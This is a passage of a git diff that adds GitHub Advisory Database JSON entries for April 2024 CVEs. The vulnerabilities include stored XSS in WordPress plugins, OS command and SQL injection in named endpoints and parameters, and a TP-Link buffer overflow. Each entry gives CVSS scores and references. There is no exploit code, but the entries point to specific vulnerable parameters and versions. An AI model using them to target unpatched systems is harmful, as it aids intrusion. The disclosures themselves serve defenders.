"2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-2731" + ], + "details": "Users with low privileges (all permissions deselected in the administrator permissions settings) can view certain pages that expose sensitive information such as company names, users' names and surnames, stage names, and monitoring campaigns and their descriptions. In addition, unprivileged users can see and edit the descriptions of tags. At the time of publication of the CVE no patch is available.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2731" + }, + { + "type": "WEB", + "url": "https://huntr.com/bounties/4d72d300-92d6-4e3c-93d8-52fe47396ae0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T14:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-hh4j-79fp-m79v/GHSA-hh4j-79fp-m79v.json b/advisories/unreviewed/2024/04/GHSA-hh4j-79fp-m79v/GHSA-hh4j-79fp-m79v.json new file mode 100644 index 00000000000..83f1a1c2618 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-hh4j-79fp-m79v/GHSA-hh4j-79fp-m79v.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hh4j-79fp-m79v", + "modified": "2024-04-08T00:30:46Z", + "published": "2024-04-08T00:30:46Z", + "aliases": [ + "CVE-2024-3434" + ], + "details": "A vulnerability classified as critical was found in CP Plus Wi-Fi Camera up to 20240401. Affected by this vulnerability is an unknown functionality of the component User Management. The manipulation leads to improper authorization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259615. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3434" + }, + { + "type": "WEB", + "url": "https://drive.google.com/file/d/1-Fz3G5HQZxBNgeXjPfIR1bEeC_qAegWD/view?usp=sharing" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259615" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259615" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.308217" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-285" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T00:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-hhf4-hp7g-q328/GHSA-hhf4-hp7g-q328.json b/advisories/unreviewed/2024/04/GHSA-hhf4-hp7g-q328/GHSA-hhf4-hp7g-q328.json new file mode 100644 index 00000000000..206b5224b51 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-hhf4-hp7g-q328/GHSA-hhf4-hp7g-q328.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hhf4-hp7g-q328", + "modified": "2024-04-05T18:30:34Z", + "published": "2024-04-05T18:30:34Z", + "aliases": [ + "CVE-2024-3346" + ], + "details": "A vulnerability was found in Byzro Smart S80 up to 20240328. It has been declared as critical. This vulnerability affects unknown code of the file /log/webmailattach.php. The manipulation of the argument mail_file_path leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-259450 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3346" + }, + { + "type": "WEB", + "url": "https://github.com/Yu1e/vuls/blob/main/Byzro%20Networks%20Smart%20S80%20management%20platform%20has%20rce%20vulnerability.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259450" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259450" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.306277" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T16:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-hj2q-hv94-pwwx/GHSA-hj2q-hv94-pwwx.json b/advisories/unreviewed/2024/04/GHSA-hj2q-hv94-pwwx/GHSA-hj2q-hv94-pwwx.json new file mode 100644 index 00000000000..f6ad3399ee8 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-hj2q-hv94-pwwx/GHSA-hj2q-hv94-pwwx.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hj2q-hv94-pwwx", + "modified": "2024-04-09T21:31:57Z", + "published": "2024-04-09T21:31:57Z", + "aliases": [ + "CVE-2024-0826" + ], + "details": "The Qi Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 1.6.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0826" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/qi-addons-for-elementor/trunk/inc/shortcodes/info-button/class-qiaddonsforelementor-info-button-shortcode.php#L695" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3044865%40qi-addons-for-elementor%2Ftrunk&old=3025062%40qi-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=#file39" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/40a883e8-7ce0-4fca-a585-428b67144694?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-hj8p-jr2c-9cmj/GHSA-hj8p-jr2c-9cmj.json b/advisories/unreviewed/2024/04/GHSA-hj8p-jr2c-9cmj/GHSA-hj8p-jr2c-9cmj.json new file mode 100644 index 00000000000..6ec7822311a --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-hj8p-jr2c-9cmj/GHSA-hj8p-jr2c-9cmj.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hj8p-jr2c-9cmj", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-2457" + ], + "details": "The Modal Window – create popup modal window plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 5.3.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2457" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3054106/modal-window/tags/5.3.9/public/shortcode_icon.php?old=2988336&old_path=modal-window/tags/5.3.8/public/shortcode_icon.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/745709f4-bb9c-41c4-ab60-d9fc18e406a8?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-hjg7-j422-h7p9/GHSA-hjg7-j422-h7p9.json b/advisories/unreviewed/2024/04/GHSA-hjg7-j422-h7p9/GHSA-hjg7-j422-h7p9.json new file mode 100644 index 00000000000..6e5d0dbeaca --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-hjg7-j422-h7p9/GHSA-hjg7-j422-h7p9.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hjg7-j422-h7p9", + "modified": "2024-04-08T09:31:13Z", + "published": "2024-04-08T09:31:13Z", + "aliases": [ + "CVE-2023-52388" + ], + "details": "Permission control vulnerability in the clock module.\nImpact: Successful exploitation of this vulnerability will affect availability.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52388" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/3" + }, + { + "type": "WEB", + "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202403-0000001667644725" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T09:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-hm2g-j35v-6vxh/GHSA-hm2g-j35v-6vxh.json b/advisories/unreviewed/2024/04/GHSA-hm2g-j35v-6vxh/GHSA-hm2g-j35v-6vxh.json new file mode 100644 index 00000000000..f44971806ce --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-hm2g-j35v-6vxh/GHSA-hm2g-j35v-6vxh.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hm2g-j35v-6vxh", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-23083" + ], + "details": "Time4J Base v5.9.3 was discovered to contain a NullPointerException via the component net.time4j.format.internal.FormatUtils::useDefaultWeekmodel(Locale).", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23083" + }, + { + "type": "WEB", + "url": "https://gist.github.com/LLM4IG/624598834f6699e3617d47c675227e97" + }, + { + "type": "WEB", + "url": "https://github.com/MenoData/Time4J" + }, + { + "type": "WEB", + "url": "http://time4j.com" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T14:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-hm5j-36v4-g9h6/GHSA-hm5j-36v4-g9h6.json b/advisories/unreviewed/2024/04/GHSA-hm5j-36v4-g9h6/GHSA-hm5j-36v4-g9h6.json new file mode 100644 index 00000000000..0dd47476e1f --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-hm5j-36v4-g9h6/GHSA-hm5j-36v4-g9h6.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hm5j-36v4-g9h6", + "modified": "2024-04-09T15:30:37Z", + "published": "2024-04-09T15:30:37Z", + "aliases": [ + "CVE-2024-21755" + ], + "details": "A improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiSandbox version 4.4.0 through 4.4.3 and 4.2.0 through 4.2.6 and 4.0.0 through 4.0.4 allows attacker to execute unauthorized code or commands via crafted requests..", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21755" + }, + { + "type": "WEB", + "url": "https://fortiguard.com/psirt/FG-IR-23-489" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T15:15:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-hp4q-94j3-v97q/GHSA-hp4q-94j3-v97q.json b/advisories/unreviewed/2024/04/GHSA-hp4q-94j3-v97q/GHSA-hp4q-94j3-v97q.json new file mode 100644 index 00000000000..7ddef5288ea --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-hp4q-94j3-v97q/GHSA-hp4q-94j3-v97q.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hp4q-94j3-v97q", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-28904" + ], + "details": "Microsoft Brokering File System Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28904" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28904" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-hpjc-v8f5-7fg8/GHSA-hpjc-v8f5-7fg8.json b/advisories/unreviewed/2024/04/GHSA-hpjc-v8f5-7fg8/GHSA-hpjc-v8f5-7fg8.json new file mode 100644 index 00000000000..7b0783d20d3 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-hpjc-v8f5-7fg8/GHSA-hpjc-v8f5-7fg8.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hpjc-v8f5-7fg8", + "modified": "2024-04-09T18:30:24Z", + "published": "2024-04-09T18:30:24Z", + "aliases": [ + "CVE-2024-26168" + ], + "details": "Secure Boot Security Feature Bypass Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26168" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26168" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-hpm2-9x59-72x4/GHSA-hpm2-9x59-72x4.json b/advisories/unreviewed/2024/04/GHSA-hpm2-9x59-72x4/GHSA-hpm2-9x59-72x4.json new file mode 100644 index 00000000000..1706b2356b1 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-hpm2-9x59-72x4/GHSA-hpm2-9x59-72x4.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hpm2-9x59-72x4", + "modified": "2024-04-08T00:30:46Z", + "published": "2024-04-08T00:30:46Z", + "aliases": [ + "CVE-2024-3432" + ], + "details": "A vulnerability was found in PuneethReddyHC Event Management 1.0. It has been rated as critical. This issue affects some unknown processing of the file /backend/register.php. The manipulation of the argument event_id/full_name/email/mobile/college/branch leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259613 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3432" + }, + { + "type": "WEB", + "url": "https://packetstormsecurity.com/files/177841/Event-Management-1.0-SQL-Injection.html" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259613" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259613" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T23:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-hq3q-jwq2-6p5h/GHSA-hq3q-jwq2-6p5h.json b/advisories/unreviewed/2024/04/GHSA-hq3q-jwq2-6p5h/GHSA-hq3q-jwq2-6p5h.json new file mode 100644 index 00000000000..63525020b32 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-hq3q-jwq2-6p5h/GHSA-hq3q-jwq2-6p5h.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hq3q-jwq2-6p5h", + "modified": "2024-04-09T18:30:24Z", + "published": "2024-04-09T18:30:24Z", + "aliases": [ + "CVE-2024-20678" + ], + "details": "Remote Procedure Call Runtime Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20678" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20678" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-843" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-hqgx-pm48-7q37/GHSA-hqgx-pm48-7q37.json b/advisories/unreviewed/2024/04/GHSA-hqgx-pm48-7q37/GHSA-hqgx-pm48-7q37.json new file mode 100644 index 00000000000..8b9c770310b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-hqgx-pm48-7q37/GHSA-hqgx-pm48-7q37.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hqgx-pm48-7q37", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:25Z", + "aliases": [ + "CVE-2024-26230" + ], + "details": "Windows Telephony Server Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26230" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26230" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-hrmq-cvm6-g5v6/GHSA-hrmq-cvm6-g5v6.json b/advisories/unreviewed/2024/04/GHSA-hrmq-cvm6-g5v6/GHSA-hrmq-cvm6-g5v6.json new file mode 100644 index 00000000000..fd7bb824fa9 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-hrmq-cvm6-g5v6/GHSA-hrmq-cvm6-g5v6.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hrmq-cvm6-g5v6", + "modified": "2024-04-06T09:31:03Z", + "published": "2024-04-06T09:31:03Z", + "aliases": [ + "CVE-2024-3364" + ], + "details": "A vulnerability was found in SourceCodester Online Library System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file admin/books/index.php. The manipulation of the argument id leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259468.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3364" + }, + { + "type": "WEB", + "url": "https://github.com/thisissuperann/Vul/blob/main/Online-Library-System-06.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259468" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259468" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.310431" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T09:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-hrxg-27x5-39h2/GHSA-hrxg-27x5-39h2.json b/advisories/unreviewed/2024/04/GHSA-hrxg-27x5-39h2/GHSA-hrxg-27x5-39h2.json new file mode 100644 index 00000000000..769ea7acdc4 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-hrxg-27x5-39h2/GHSA-hrxg-27x5-39h2.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hrxg-27x5-39h2", + "modified": "2024-04-09T15:30:37Z", + "published": "2024-04-09T15:30:37Z", + "aliases": [ + "CVE-2023-49909" + ], + "details": "A stack-based buffer overflow vulnerability exists in the web interface Radio Scheduling functionality of Tp-Link AC1350 Wireless MU-MIMO Gigabit Access Point (EAP225 V3) v5.1.0 Build 20220926. A specially crafted series of HTTP requests can lead to remote code execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.This vulnerability refers specifically to the overflow that occurs via the `action` parameter at offset `0x0045ab38` of the `httpd_portal` binary shipped with v5.1.0 Build 20220926 of the EAP225.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49909" + }, + { + "type": "WEB", + "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1888" + }, + { + "type": "WEB", + "url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1888" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T15:15:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-hw4f-q5qf-mr8m/GHSA-hw4f-q5qf-mr8m.json b/advisories/unreviewed/2024/04/GHSA-hw4f-q5qf-mr8m/GHSA-hw4f-q5qf-mr8m.json new file mode 100644 index 00000000000..4d5205bc401 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-hw4f-q5qf-mr8m/GHSA-hw4f-q5qf-mr8m.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hw4f-q5qf-mr8m", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-26251" + ], + "details": "Microsoft SharePoint Server Spoofing Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26251" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26251" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-hw6g-94cf-m7rp/GHSA-hw6g-94cf-m7rp.json b/advisories/unreviewed/2024/04/GHSA-hw6g-94cf-m7rp/GHSA-hw6g-94cf-m7rp.json new file mode 100644 index 00000000000..f7539154390 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-hw6g-94cf-m7rp/GHSA-hw6g-94cf-m7rp.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hw6g-94cf-m7rp", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2187" + ], + "details": "The Beaver Builder Addons by WPZOOM plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Testimonials widget in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2187" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3046905/wpzoom-addons-for-beaver-builder" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/02fceb91-7691-4629-b18b-57959e9f3f62?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-hw9j-mg68-r593/GHSA-hw9j-mg68-r593.json b/advisories/unreviewed/2024/04/GHSA-hw9j-mg68-r593/GHSA-hw9j-mg68-r593.json new file mode 100644 index 00000000000..cc92392eb43 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-hw9j-mg68-r593/GHSA-hw9j-mg68-r593.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hw9j-mg68-r593", + "modified": "2024-04-07T18:30:30Z", + "published": "2024-04-07T18:30:30Z", + "aliases": [ + "CVE-2024-31296" + ], + "details": "Authorization Bypass Through User-Controlled Key vulnerability in Repute Infosystems BookingPress.This issue affects BookingPress: from n/a through 1.0.81.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31296" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/bookingpress-appointment-booking/wordpress-bookingpress-plugin-1-0-81-insecure-direct-object-references-idor-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T18:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-hx3x-jq5m-p7xj/GHSA-hx3x-jq5m-p7xj.json b/advisories/unreviewed/2024/04/GHSA-hx3x-jq5m-p7xj/GHSA-hx3x-jq5m-p7xj.json new file mode 100644 index 00000000000..d6a464a44b8 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-hx3x-jq5m-p7xj/GHSA-hx3x-jq5m-p7xj.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hx3x-jq5m-p7xj", + "modified": "2024-04-09T15:30:37Z", + "published": "2024-04-09T15:30:37Z", + "aliases": [ + "CVE-2023-41677" + ], + "details": "A insufficiently protected credentials in Fortinet FortiProxy 7.4.0, 7.2.0 through 7.2.6, 7.0.0 through 7.0.12, 2.0.0 through 2.0.13, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6, 1.0.0 through 1.0.7, Fortinet FortiOS 7.4.0 through 7.4.1, 7.2.0 through 7.2.6, 7.0.0 through 7.0.12, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, 6.0.0 through 6.0.17 allows attacker to execute unauthorized code or commands via targeted social engineering attack", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41677" + }, + { + "type": "WEB", + "url": "https://fortiguard.com/psirt/FG-IR-23-430" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-522" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T15:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-hxvx-w43m-m8wv/GHSA-hxvx-w43m-m8wv.json b/advisories/unreviewed/2024/04/GHSA-hxvx-w43m-m8wv/GHSA-hxvx-w43m-m8wv.json new file mode 100644 index 00000000000..1658705edfa --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-hxvx-w43m-m8wv/GHSA-hxvx-w43m-m8wv.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + 